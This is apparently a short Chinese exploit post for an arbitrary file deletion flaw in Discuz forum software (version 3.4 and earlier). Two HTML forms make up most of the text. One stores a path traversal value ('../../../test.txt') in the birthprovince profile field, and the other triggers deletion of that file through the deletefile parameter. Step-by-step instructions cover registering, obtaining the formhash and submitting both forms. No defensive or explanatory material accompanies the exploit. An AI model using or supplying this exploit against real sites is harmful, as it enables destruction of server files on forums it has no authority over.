discuz 任意文件删除

漏洞影响范围 discuz <= 3.4

exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
<form action="http://www.xxx.com/home.php?mod=spacecp&ac=profile&op=base" method="POST" enctype="multipart/form-data">
<input type="text"name="birthprovince" id="text" value="../../../test.txt" />
<input type="text"name="formhash" value="de746a38"/></p>
<input type="text"name="profilesubmit" value="1"/></p>
<input type="submit"value="Submit" />
</form>

<br />

<form action="http://www.xxx.com/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file"name="birthprovince" id="file" />
<input type="text"name="formhash" value="de746a38"/></p>
<input type="text"name="profilesubmit" value="1"/></p>
<input type="submit"value="Submit" />
</form>

首先在前台注册账号

个人中心 修改个人资料

右键查看 formhash

修改 exp 中的网址

填上要删除的文件 formhash 选择文件

两个 submit 分别提交

0%